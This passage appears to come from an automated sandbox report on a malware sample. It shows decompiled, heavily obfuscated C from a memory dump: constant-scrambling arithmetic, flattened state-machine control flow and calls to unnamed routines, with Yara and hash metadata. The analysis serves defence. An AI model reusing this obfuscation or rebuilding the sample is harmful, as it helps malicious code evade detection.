				_t540 =  &_v2792;
				_v2608 = 0xc2e830;
				_v2604 = 0;
				_v2620 = 0xf51a3;
				_t476 = 0x67;
				_v2620 = _v2620 * 0x7f;
				_t535 = __ecx;
				_v2620 = _v2620 ^ 0x07997ff4;
				_t536 = 0xe76a3a8;
				_v2760 = 0x48c27b;
				_v2760 = _v2760 + 0xffff36b1;
				_t479 = 0x48;
				_v2760 = _v2760 * 0x3f;
				_v2760 = _v2760 << 0xc;
				_v2760 = _v2760 ^ 0x651f7ebc;
				_v2612 = 0xfc3500;
				_v2612 = _v2612 / _t476;
				_v2612 = _v2612 ^ 0x00079610;
				_v2672 = 0xb4b661;
				_v2672 = _v2672 + 0xa6;
				_v2672 = _v2672 ^ 0x00b9a64a;
				_v2616 = 0x62280e;
				_v2616 = _v2616 + 0xffff1eda;
				_v2616 = _v2616 ^ 0x0067e11b;
				_v2784 = 0x1290e3;
				_v2784 = _v2784 + 0x3f36;
				_v2784 = _v2784 * 0x61;
				_v2784 = _v2784 * 0x2b;
				_v2784 = _v2784 ^ 0x32806e0c;
				_v2664 = 0x6cde68;
				_v2664 = _v2664 + 0xffffaa7c;
				_v2664 = _v2664 ^ 0x0062140e;
				_v2700 = 0xdf7730;
				_v2700 = _v2700 ^ 0x86f4d2b7;
				_v2700 = _v2700 ^ 0x7459e253;
				_v2700 = _v2700 ^ 0xf27d5fa1;
				_v2744 = 0xb5ff53;
				_v2744 = _v2744 + 0x39dd;
				_v2744 = _v2744 / _t479;
				_v2744 = _v2744 ^ 0x3b8c39c6;
				_v2744 = _v2744 ^ 0x3b854486;
				_v2720 = 0xab11bb;
				_v2720 = _v2720 / _t476;
				_v2720 = _v2720 >> 8;
				_v2720 = _v2720 ^ 0x00080df3;
				_v2656 = 0x9a94e2;
				_v2656 = _v2656 | 0x27e9145d;
				_v2656 = _v2656 ^ 0x27f2cc75;
				_v2776 = 0x993637;
				_v2776 = _v2776 ^ 0x9075c8e7;
				_v2776 = _v2776 << 0xe;
				_v2776 = _v2776 ^ 0x48a8215b;
				_v2776 = _v2776 ^ 0x771c2be3;
				_v2624 = 0x82a702;
				_v2624 = _v2624 + 0xffffbd86;
				_v2624 = _v2624 ^ 0x00856afd;
				_v2768 = 0x122ac8;
				_v2768 = _v2768 ^ 0xa223bf20;
				_v2768 = _v2768 + 0xffff9848;
				_v2768 = _v2768 >> 9;
				_v2768 = _v2768 ^ 0x005ed417;
				_v2648 = 0x87510a;
				_t480 = 0x5c;
				_v2648 = _v2648 / _t480;
				_v2648 = _v2648 ^ 0x0001815e;
				_v2752 = 0x323d28;
				_v2752 = _v2752 << 3;
				_v2752 = _v2752 ^ 0x3d7f47dd;
				_t481 = 0x1e;
				_v2752 = _v2752 / _t481;
				_v2752 = _v2752 ^ 0x020ee85d;
				_v2688 = 0xebaf12;
				_t482 = 0x25;
				_v2688 = _v2688 * 0x4a;
				_v2688 = _v2688 + 0xffff3d77;
				_v2688 = _v2688 ^ 0x4418f2bb;
				_v2680 = 0xb0b21c;
				_v2680 = _v2680 | 0x50d4595b;
				_v2680 = _v2680 ^ 0x50f45fd3;
				_v2792 = 0x50a368;
				_v2792 = _v2792 / _t482;
				_v2792 = _v2792 >> 7;
				_v2792 = _v2792 << 6;
				_v2792 = _v2792 ^ 0x0002e3f4;
				_v2712 = 0xfb01c9;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x88d7bdd4;
				_v2712 = _v2712 ^ 0x88d5db18;
				_v2628 = 0x2c21a7;
				_v2628 = _v2628 ^ 0xc066ec07;
				_v2628 = _v2628 ^ 0xc0478ae0;
				_v2736 = 0xdf4f50;
				_v2736 = _v2736 ^ 0x5d2cf67a;
				_v2736 = _v2736 >> 4;
				_v2736 = _v2736 + 0xffffdc76;
				_v2736 = _v2736 ^ 0x05da4378;
				_v2704 = 0xaf142e;
				_v2704 = _v2704 ^ 0xc2f701c3;
				_v2704 = _v2704 + 0xce28;
				_v2704 = _v2704 ^ 0xc2546cf8;
				_v2696 = 0x7de64;
				_v2696 = _v2696 ^ 0xd20f3d11;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 ^ 0x000ece64;
				_v2640 = 0x20e284;
				_v2640 = _v2640 / _t482;
				_v2640 = _v2640 ^ 0x00094857;
				_v2780 = 0xa00147;
				_v2780 = _v2780 ^ 0xd8a23c8a;
				_v2780 = _v2780 + 0xe3e1;
				_v2780 = _v2780 >> 5;
				_v2780 = _v2780 ^ 0x06c8715d;
				_v2788 = 0x334aa5;
				_v2788 = _v2788 ^ 0x7b497487;
				_v2788 = _v2788 ^ 0xeb6f8a6d;
				_v2788 = _v2788 | 0x40ad4a39;
				_v2788 = _v2788 ^ 0xd0b57248;
				_v2724 = 0x69a4bf;
				_v2724 = _v2724 ^ 0x02573135;
				_v2724 = _v2724 + 0xffffc79e;
				_v2724 = _v2724 ^ 0x023736b5;
				_v2632 = 0x3d156b;
				_v2632 = _v2632 + 0xffffb0a3;
				_v2632 = _v2632 ^ 0x003266c5;
				_v2756 = 0x62802e;
				_v2756 = _v2756 + 0xffff042b;
				_v2756 = _v2756 + 0x843f;
				_v2756 = _v2756 + 0xffffc6b8;
				_v2756 = _v2756 ^ 0x0060e8a4;
				_v2764 = 0x76b393;
				_v2764 = _v2764 | 0x335760de;
				_t483 = 0x45;
				_v2764 = _v2764 / _t483;
				_v2764 = _v2764 >> 2;
				_v2764 = _v2764 ^ 0x00260b06;
				_v2772 = 0x662dd4;
				_v2772 = _v2772 ^ 0x4e06dec5;
				_v2772 = _v2772 + 0xffffa50b;
				_v2772 = _v2772 + 0x664c;
				_v2772 = _v2772 ^ 0x4e68febc;
				_v2660 = 0x72b7c6;
				_t484 = 0x75;
				_v2660 = _v2660 / _t484;
				_v2660 = _v2660 ^ 0x000a5303;
				_v2748 = 0x5d98b3;
				_t485 = 3;
				_v2748 = _v2748 * 0x7d;
				_v2748 = _v2748 | 0x3b3beecf;
				_v2748 = _v2748 >> 7;
				_v2748 = _v2748 ^ 0x007bcdbb;
				_v2668 = 0xef8e1a;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0ef91304;
				_v2676 = 0x1c9dc;
				_v2676 = _v2676 ^ 0x631b5470;
				_v2676 = _v2676 ^ 0x63118315;
				_v2716 = 0xe6297;
				_v2716 = _v2716 >> 5;
				_v2716 = _v2716 + 0xffffa4bc;
				_v2716 = _v2716 ^ 0x0003c002;
				_v2652 = 0x58df06;
				_v2652 = _v2652 + 0x9b1c;
				_v2652 = _v2652 ^ 0x0057e0fb;
				_v2728 = 0xef45c2;
				_v2728 = _v2728 << 2;
				_v2728 = _v2728 / _t485;
				_v2728 = _v2728 ^ 0x013b5353;
				_v2708 = 0xf66a57;
				_t486 = 0x4d;
				_v2708 = _v2708 / _t486;
				_v2708 = _v2708 | 0x016aaa3c;
				_v2708 = _v2708 ^ 0x016da6a4;
				_v2740 = 0xf12740;
				_v2740 = _v2740 >> 0xa;
				_v2740 = _v2740 | 0x0ff71d16;
				_v2740 = _v2740 ^ 0xb9387d97;
				_v2740 = _v2740 ^ 0xb6ca3c25;
				_v2684 = 0x3679f2;
				_v2684 = _v2684 ^ 0x117de90f;
				_v2684 = _v2684 >> 5;
				_v2684 = _v2684 ^ 0x008d015a;
				_v2636 = 0xe27d6a;
				_v2636 = _v2636 << 5;
				_v2636 = _v2636 ^ 0x1c43d9b1;
				_v2732 = 0x82455e;
				_v2732 = _v2732 * 0x2a;
				_v2732 = _v2732 << 1;
				_v2732 = _v2732 | 0x0b6dc2a5;
				_v2732 = _v2732 ^ 0x2bf1cd3e;
				_v2692 = 0xc24a5d;
				_v2692 = _v2692 >> 0x10;
				_v2692 = _v2692 | 0xee236fdb;
				_v2692 = _v2692 ^ 0xee2faf1d;
				_v2644 = 0x14d94f;
				_t487 = 0x39;
				_t457 = _v2644 / _t487;
				_v2644 = _t457;
				_v2644 = _v2644 ^ 0x000dae69;
				do {
					while(_t536 != 0x13254dd) {
						if(_t536 == 0xe76a3a8) {
							_t536 = 0x13254dd;
							continue;
						} else {
							_t548 = _t536 - 0xf9d6351;
							if(_t536 == 0xf9d6351) {
								E001CB3B4(_v2780, _t487, _v2788, _t487, _v2724,  &_v1040, _v2632, _v2620);
								_push(_v2772);
								_push(_v2764);
								E001D2EA5( &_v2080, _t548,  &_v1040, 0x1c1494, _v2748, _v2668, E001DCD35(0x1c1494, _v2756, _t548), _v2676, _v2716,  &_v520);
								E001D629F(_v2652, _t470, _v2728, _v2708, _v2740);
								return E001DEA55( &_v520, _v2684, _t548, _v2636, 0, _v2732, 0, _v2692, _v2644, 0);
							}
							goto L9;
						}
						L5:
						return _t457;
					}
					E001D855C( &_v2600, _v2760, __eflags, _v2612, _v2672, _t487, _v2616);
					 *((short*)(E001C2B69(_v2784, _v2664,  &_v2600, _v2700))) = 0;
					E001C3432( &_v1560, _v2744, __eflags, _v2720);
					_push(_v2624);
					_push(_v2776);
					E001D2EA5( &_v1560, __eflags,  &_v2600, 0x1c1404, _v2648, _v2752, E001DCD35(0x1c1404, _v2656, __eflags), _v2688, _v2680,  &_v2080);
					E001D629F(_v2792, _t462, _v2712, _v2628, _v2736);
					_t487 = _t535;
					_t457 = E001DE5A7(_t535, _v2704, _v2696,  &_v2080, _v2640);
					_t540 =  &(_t540[0x17]);
					__eflags = _t457;
					if(_t457 != 0) {
						_t536 = 0xf9d6351;
						goto L9;
					}
					goto L5;
					L9:
					__eflags = _t536 - 0x7fda310;
				} while (__eflags != 0);
				return _t457;
			}





































































                          0x001cc0ea
                          0x001cc0f0
                          0x001cc101
                          0x001cc108
                          0x001cc11f
                          0x001cc120
                          0x001cc127
                          0x001cc129
                          0x001cc134
                          0x001cc139
                          0x001cc141
                          0x001cc150
                          0x001cc151
                          0x001cc155
                          0x001cc15a
                          0x001cc162
                          0x001cc178
                          0x001cc17f
                          0x001cc18a
                          0x001cc195
                          0x001cc1a0
                          0x001cc1ab
                          0x001cc1b6
                          0x001cc1c1
                          0x001cc1cc
                          0x001cc1d4
                          0x001cc1e1
                          0x001cc1ea
                          0x001cc1ee
                          0x001cc1f6
                          0x001cc201
                          0x001cc20c
                          0x001cc217
                          0x001cc21f
                          0x001cc227
                          0x001cc22f
                          0x001cc237
                          0x001cc23f
                          0x001cc24f
                          0x001cc253
                          0x001cc25b
                          0x001cc263
                          0x001cc271
                          0x001cc275
                          0x001cc27a
                          0x001cc282
                          0x001cc28d
                          0x001cc298
                          0x001cc2a3
                          0x001cc2ab
                          0x001cc2b3
                          0x001cc2b8
                          0x001cc2c0
                          0x001cc2c8
                          0x001cc2d3
                          0x001cc2de
                          0x001cc2e9
                          0x001cc2f1
                          0x001cc2f9
                          0x001cc301
                          0x001cc306
                          0x001cc30e
                          0x001cc324
                          0x001cc329
                          0x001cc330
                          0x001cc33b
                          0x001cc343
                          0x001cc348
                          0x001cc356
                          0x001cc35b
                          0x001cc35f
                          0x001cc367
                          0x001cc376
                          0x001cc377
                          0x001cc37b
                          0x001cc383
                          0x001cc38b
                          0x001cc396
                          0x001cc3a1
                          0x001cc3ac
                          0x001cc3bc
                          0x001cc3c0
                          0x001cc3c5
                          0x001cc3ca
                          0x001cc3d2
                          0x001cc3da
                          0x001cc3df
                          0x001cc3e7
                          0x001cc3ef
                          0x001cc3fa
                          0x001cc405
                          0x001cc410
                          0x001cc418
                          0x001cc420
                          0x001cc425
                          0x001cc42d
                          0x001cc435
                          0x001cc43d
                          0x001cc445
                          0x001cc44d
                          0x001cc455
                          0x001cc45d
                          0x001cc465
                          0x001cc46a
                          0x001cc472
                          0x001cc486
                          0x001cc48d
                          0x001cc498
                          0x001cc4a0
                          0x001cc4a8
                          0x001cc4b0
                          0x001cc4b5
                          0x001cc4bd
                          0x001cc4c5
                          0x001cc4cd
                          0x001cc4d5
                          0x001cc4dd
                          0x001cc4e5
                          0x001cc4ed
                          0x001cc4f5
                          0x001cc4fd
                          0x001cc505
                          0x001cc510
                          0x001cc51b
                          0x001cc526
                          0x001cc52e
                          0x001cc536
                          0x001cc53e
                          0x001cc548
                          0x001cc550
                          0x001cc558
                          0x001cc566
                          0x001cc56b
                          0x001cc571
                          0x001cc576
                          0x001cc57e
                          0x001cc586
                          0x001cc58e
                          0x001cc596
                          0x001cc59e
                          0x001cc5a6
                          0x001cc5b8
                          0x001cc5bd
                          0x001cc5c6
                          0x001cc5d1
                          0x001cc5de
                          0x001cc5e1
                          0x001cc5e5
                          0x001cc5ed
                          0x001cc5f2
                          0x001cc5fa
                          0x001cc605
                          0x001cc60d
                          0x001cc618
                          0x001cc623
                          0x001cc62e
                          0x001cc639
                          0x001cc641
                          0x001cc646
                          0x001cc64e
                          0x001cc656
                          0x001cc661
                          0x001cc66c
                          0x001cc677
                          0x001cc67f
                          0x001cc68c
                          0x001cc690
                          0x001cc698
                          0x001cc6a4
                          0x001cc6a7
                          0x001cc6ab
                          0x001cc6b3
                          0x001cc6bb
                          0x001cc6c3
                          0x001cc6c8
                          0x001cc6d0
                          0x001cc6d8
                          0x001cc6e0
                          0x001cc6e8
                          0x001cc6f0
                          0x001cc6f5
                          0x001cc6fd
                          0x001cc708
                          0x001cc710
                          0x001cc71b
                          0x001cc728
                          0x001cc72c
                          0x001cc730
                          0x001cc738
                          0x001cc740
                          0x001cc748
                          0x001cc74f
                          0x001cc75c
                          0x001cc764
                          0x001cc778
                          0x001cc779
                          0x001cc77b
                          0x001cc782
                          0x001cc78d
                          0x001cc78d
                          0x001cc79b
                          0x001cc889
                          0x00000000
                          0x001cc7a1
                          0x001cc7a1
                          0x001cc7a7
                          0x001cc7d1
                          0x001cc7d6
                          0x001cc7df
                          0x001cc827
                          0x001cc844
                          0x00000000
                          0x001cc87b
                          0x00000000
                          0x001cc7a7
                          0x001cc888
                          0x001cc888
                          0x001cc888
                          0x001cc8b1
                          0x001cc8dc
                          0x001cc8e6
                          0x001cc8eb
                          0x001cc8f7
                          0x001cc942
                          0x001cc95f
                          0x001cc972
                          0x001cc983
                          0x001cc988
                          0x001cc98b
                          0x001cc98d
                          0x001cc993
                          0x00000000
                          0x001cc993
                          0x00000000
                          0x001cc998
                          0x001cc998
                          0x001cc998
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (=2$6?$Lf$SYt$WH$j}
                          • API String ID: 0-1853663992
                          • Opcode ID: 9999300b7c50da4d007bca49c833f15ef080009401b2a8816a9744abac619136
                          • Instruction ID: 3e94ee46dbb6812ea2b13b690b03d73cad9475e8ab8ea897a86f8e6742531663
                          • Opcode Fuzzy Hash: 9999300b7c50da4d007bca49c833f15ef080009401b2a8816a9744abac619136
                          • Instruction Fuzzy Hash: 9A22F27150C3819FD768CF61C58AA8BBBE2FBD5348F108A1DE2D996260D7B18949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C3A6C, Relevance: 7.8, Strings: 6, Instructions: 276COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E001C3A6C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t296;
				void* _t317;
				void* _t329;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				intOrPtr _t363;
				signed int* _t366;

				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t296 = E001C358A(0);
				_v72 = _t296;
				_t363 = _t296;
				_v112 = 0xebd107;
				_t366 =  &(( &_v188)[0xa]);
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xa7f575e2;
				_t329 = 0xf3b6f74;
				_v112 = _v112 ^ 0xa7f57bf6;
				_v160 = 0xb00c17;
				_v160 = _v160 + 0xffff8c1d;
				_v160 = _v160 >> 7;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x2be60020;
				_v100 = 0xaecfed;
				_t355 = 0x47;
				_v100 = _v100 * 0x5e;
				_v100 = _v100 ^ 0x4038a8f8;
				_v148 = 0x5d8832;
				_v148 = _v148 >> 0xe;
				_v148 = _v148 * 0x55;
				_v148 = _v148 ^ 0xfb138f4a;
				_v148 = _v148 ^ 0xfb1acafa;
				_v156 = 0xd0ad54;
				_v156 = _v156 | 0xf197358a;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0xe046c41b;
				_v156 = _v156 ^ 0xe0312259;
				_v128 = 0xba314b;
				_v128 = _v128 << 4;
				_v128 = _v128 ^ 0xa41671cd;
				_v128 = _v128 ^ 0xafbf0bed;
				_v144 = 0x19b960;
				_v144 = _v144 + 0xc84d;
				_v144 = _v144 << 2;
				_v144 = _v144 + 0x9efb;
				_v144 = _v144 ^ 0x006c13e0;
				_v184 = 0x1825f1;
				_v184 = _v184 >> 4;
				_v184 = _v184 + 0x9f55;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x000ab8e0;
				_v80 = 0x3761db;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x0067643f;
				_v176 = 0x30c4c1;
				_v176 = _v176 | 0xedf1185f;
				_v176 = _v176 / _t355;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x000311fd;
				_v120 = 0x3675af;
				_v120 = _v120 + 0xffff5842;
				_t356 = 0x68;
				_v120 = _v120 / _t356;
				_v120 = _v120 ^ 0x0001d04e;
				_v96 = 0x8764a2;
				_v96 = _v96 + 0x91f3;
				_v96 = _v96 ^ 0x008667d4;
				_v116 = 0xa8f347;
				_v116 = _v116 + 0xffff0773;
				_v116 = _v116 | 0x401fbbca;
				_v116 = _v116 ^ 0x40b7909a;
				_v124 = 0x8d3db0;
				_v124 = _v124 + 0xffffcdbe;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x0003406e;
				_v180 = 0x115e15;
				_v180 = _v180 | 0x396b9ab3;
				_t357 = 0x7f;
				_v180 = _v180 * 0x32;
				_v180 = _v180 * 0x7f;
				_v180 = _v180 ^ 0xde8ec418;
				_v188 = 0x68220f;
				_v188 = _v188 + 0xffff13e1;
				_v188 = _v188 | 0x0b5e43f9;
				_v188 = _v188 ^ 0x0308cb28;
				_v188 = _v188 ^ 0x087cea89;
				_v88 = 0xb4154e;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x01626326;
				_v136 = 0x855f19;
				_v136 = _v136 + 0xb245;
				_v136 = _v136 * 0x51;
				_v136 = _v136 / _t357;
				_v136 = _v136 ^ 0x0059d3c9;
				_v168 = 0x44e15b;
				_t158 =  &_v168; // 0x44e15b
				_t358 = 0x4f;
				_v168 =  *_t158 / _t358;
				_v168 = _v168 + 0xffff2550;
				_v168 = _v168 + 0x2e54;
				_v168 = _v168 ^ 0x0007a068;
				_v104 = 0xc4e2f2;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x4e2d0c56;
				_v152 = 0x191f59;
				_t359 = 0x18;
				_v152 = _v152 / _t359;
				_t360 = 0x4b;
				_v152 = _v152 * 0x66;
				_v152 = _v152 | 0x67a82f25;
				_v152 = _v152 ^ 0x67e7edf1;
				_v76 = 0x773f82;
				_v76 = _v76 << 3;
				_v76 = _v76 ^ 0x03bd8775;
				_v164 = 0xdfa2a4;
				_v164 = _v164 << 0x10;
				_v164 = _v164 / _t360;
				_v164 = _v164 ^ 0xe1f644dd;
				_v164 = _v164 ^ 0xe3d7bab6;
				_v172 = 0x806f2b;
				_v172 = _v172 | 0x09d9a691;
				_v172 = _v172 << 3;
				_v172 = _v172 + 0xd5b;
				_v172 = _v172 ^ 0x4ec1b9af;
				_v108 = 0x65c2b2;
				_v108 = _v108 + 0x56cb;
				_v108 = _v108 | 0x6643a08f;
				_v108 = _v108 ^ 0x666fbd3b;
				_v84 = 0x79d442;
				_v84 = _v84 | 0xf9b6c9c5;
				_v84 = _v84 ^ 0xf9f007ba;
				_v132 = 0xf7cc86;
				_v132 = _v132 ^ 0x895b3781;
				_v132 = _v132 >> 8;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x011abe6f;
				_v92 = 0x6d7b91;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x000bbde8;
				_v140 = 0x9696da;
				_t361 = 5;
				_v140 = _v140 / _t361;
				_v140 = _v140 << 0xd;
				_v140 = _v140 + 0xffffb5e2;
				_v140 = _v140 ^ 0xc3cb1fba;
				do {
					while(_t329 != 0x1a8bd1c) {
						if(_t329 == 0x3a6dea5) {
							E001D365D(_v128,  &_v68, _v144, 0x44, _v184, _v80);
							_push(_v96);
							_v68 = 0x44;
							_push(_v120);
							_v60 = E001DCD35(0x1c1908, _v176, __eflags);
							_t363 = E001DB233(0x1c1908, _v116, 0x1c1908,  &_v68, 0x1c1908, _v124, _v180, _a16, _v188, _v160 | _v112, _v72, _a4, _v88, _a20, 0x1c1908, _v136, _v168, _v104, 0, _v152);
							E001D629F(_v76, _v60, _v164, _v172, _v108);
							_t366 =  &(_t366[0x1b]);
							_t329 = 0xef6864e;
							continue;
						} else {
							if(_t329 == 0xef6864e) {
								E001C96D0(_v84, _v132, _v72, _v92, _v140);
							} else {
								if(_t329 != 0xf3b6f74) {
									goto L10;
								} else {
									_t329 = 0x1a8bd1c;
									continue;
								}
							}
						}
						L13:
						return _t363;
					}
					_push(_t329);
					_t317 = E001E1AF1(_a16,  &_v72, _v100, _v148, _v156);
					_t366 =  &(_t366[4]);
					__eflags = _t317;
					if(_t317 == 0) {
						_t329 = 0xcc77c98;
						goto L10;
					} else {
						_t329 = 0x3a6dea5;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t329 - 0xcc77c98;
				} while (_t329 != 0xcc77c98);
				goto L13;
			}















































                          0x001c3a76
                          0x001c3a7f
                          0x001c3a86
                          0x001c3a87
                          0x001c3a8e
                          0x001c3a95
                          0x001c3a9c
                          0x001c3aa3
                          0x001c3aaa
                          0x001c3aab
                          0x001c3aac
                          0x001c3ab1
                          0x001c3ab8
                          0x001c3aba
                          0x001c3ac5
                          0x001c3ac8
                          0x001c3acf
                          0x001c3ad7
                          0x001c3adc
                          0x001c3ae4
                          0x001c3aec
                          0x001c3af4
                          0x001c3af9
                          0x001c3afe
                          0x001c3b06
                          0x001c3b15
                          0x001c3b18
                          0x001c3b1c
                          0x001c3b24
                          0x001c3b2c
                          0x001c3b36
                          0x001c3b3a
                          0x001c3b42
                          0x001c3b4a
                          0x001c3b52
                          0x001c3b5a
                          0x001c3b5f
                          0x001c3b67
                          0x001c3b6f
                          0x001c3b77
                          0x001c3b7c
                          0x001c3b84
                          0x001c3b8c
                          0x001c3b94
                          0x001c3b9c
                          0x001c3ba1
                          0x001c3ba9
                          0x001c3bb1
                          0x001c3bb9
                          0x001c3bbe
                          0x001c3bc6
                          0x001c3bcb
                          0x001c3bd3
                          0x001c3bde
                          0x001c3be5
                          0x001c3bf0
                          0x001c3bf8
                          0x001c3c08
                          0x001c3c0c
                          0x001c3c11
                          0x001c3c19
                          0x001c3c21
                          0x001c3c2d
                          0x001c3c30
                          0x001c3c34
                          0x001c3c3c
                          0x001c3c44
                          0x001c3c4e
                          0x001c3c56
                          0x001c3c5e
                          0x001c3c66
                          0x001c3c6e
                          0x001c3c76
                          0x001c3c7e
                          0x001c3c86
                          0x001c3c8b
                          0x001c3c93
                          0x001c3c9b
                          0x001c3caa
                          0x001c3cad
                          0x001c3cb6
                          0x001c3cba
                          0x001c3cc2
                          0x001c3cca
                          0x001c3cd2
                          0x001c3cda
                          0x001c3ce2
                          0x001c3cea
                          0x001c3cf2
                          0x001c3cf6
                          0x001c3cfe
                          0x001c3d06
                          0x001c3d13
                          0x001c3d1f
                          0x001c3d23
                          0x001c3d2b
                          0x001c3d33
                          0x001c3d37
                          0x001c3d3c
                          0x001c3d42
                          0x001c3d4a
                          0x001c3d52
                          0x001c3d5a
                          0x001c3d62
                          0x001c3d67
                          0x001c3d6f
                          0x001c3d7b
                          0x001c3d80
                          0x001c3d8b
                          0x001c3d8c
                          0x001c3d90
                          0x001c3d98
                          0x001c3da0
                          0x001c3dab
                          0x001c3db3
                          0x001c3dbe
                          0x001c3dc6
                          0x001c3dd1
                          0x001c3dd5
                          0x001c3ddd
                          0x001c3de5
                          0x001c3ded
                          0x001c3df5
                          0x001c3dfa
                          0x001c3e02
                          0x001c3e0a
                          0x001c3e12
                          0x001c3e1a
                          0x001c3e22
                          0x001c3e2c
                          0x001c3e39
                          0x001c3e46
                          0x001c3e4e
                          0x001c3e56
                          0x001c3e5e
                          0x001c3e63
                          0x001c3e67
                          0x001c3e6f
                          0x001c3e77
                          0x001c3e7c
                          0x001c3e84
                          0x001c3e92
                          0x001c3e9a
                          0x001c3e9e
                          0x001c3ea3
                          0x001c3eab
                          0x001c3eb3
                          0x001c3eb3
                          0x001c3ebd
                          0x001c3ef4
                          0x001c3ef9
                          0x001c3f02
                          0x001c3f0d
                          0x001c3f1d
                          0x001c3f92
                          0x001c3faa
                          0x001c3faf
                          0x001c3fb2
                          0x00000000
                          0x001c3ebf
                          0x001c3ec5
                          0x001c4010
                          0x001c3ecb
                          0x001c3ed1
                          0x00000000
                          0x001c3ed7
                          0x001c3ed7
                          0x00000000
                          0x001c3ed7
                          0x001c3ed1
                          0x001c3ec5
                          0x001c4019
                          0x001c4024
                          0x001c4024
                          0x001c3fbc
                          0x001c3fd7
                          0x001c3fdc
                          0x001c3fdf
                          0x001c3fe1
                          0x001c3fea
                          0x00000000
                          0x001c3fe3
                          0x001c3fe3
                          0x00000000
                          0x001c3fe3
                          0x00000000
                          0x001c3fec
                          0x001c3fec
                          0x001c3fec
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $?dg$D$Y"1$[$[D
                          • API String ID: 0-1233106220
                          • Opcode ID: 7c7116151dd9e6e03db3963b99f7c81eda236dddbb20a4af5518df770d3b0227
                          • Instruction ID: a5cff8687ae658642dfe3fd0cb53aa81312b500b05f948a7e513e4b6e8ac2888
                          • Opcode Fuzzy Hash: 7c7116151dd9e6e03db3963b99f7c81eda236dddbb20a4af5518df770d3b0227
                          • Instruction Fuzzy Hash: 1BD10F715083809FD368CF25C48AA5FFBE1BBD4358F108A1DF29A96260D7B58A49CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001C19C0, Relevance: 7.8, Strings: 6, Instructions: 254COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E001C19C0() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t281;
				void* _t285;
				void* _t286;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				void* _t301;
				void* _t331;
				signed int* _t335;

				_t335 =  &_v1156;
				_v1072 = 0x90f291;
				_v1072 = _v1072 + 0xd9fe;
				_v1072 = _v1072 ^ 0x0099b4b4;
				_v1080 = 0x97e872;
				_t291 = 0xd;
				_v1080 = _v1080 / _t291;
				_t331 = 0x6e7fa89;
				_t292 = 0x2b;
				_v1080 = _v1080 / _t292;
				_v1080 = _v1080 ^ 0x0000ab52;
				_v1128 = 0xce1f68;
				_v1128 = _v1128 ^ 0x1d391405;
				_t293 = 0x23;
				_v1128 = _v1128 / _t293;
				_v1128 = _v1128 ^ 0x00d7510b;
				_v1156 = 0x1ab415;
				_v1156 = _v1156 * 0x7d;
				_v1156 = _v1156 ^ 0x5ac1e7a5;
				_v1156 = _v1156 >> 7;
				_v1156 = _v1156 ^ 0x00a59218;
				_v1096 = 0xd4cefb;
				_v1096 = _v1096 << 6;
				_v1096 = _v1096 + 0xb17e;
				_v1096 = _v1096 ^ 0x3539ed7d;
				_v1092 = 0x25099f;
				_v1092 = _v1092 + 0xffff830d;
				_v1092 = _v1092 + 0xffff7459;
				_v1092 = _v1092 ^ 0x00248bbe;
				_v1100 = 0xa97928;
				_v1100 = _v1100 | 0xad4f66fb;
				_v1100 = _v1100 >> 7;
				_v1100 = _v1100 ^ 0x01589fbb;
				_v1060 = 0x56da0;
				_v1060 = _v1060 ^ 0xd62a4695;
				_v1060 = _v1060 ^ 0xd62d8a06;
				_v1108 = 0xa4046e;
				_v1108 = _v1108 * 0x35;
				_v1108 = _v1108 + 0xb815;
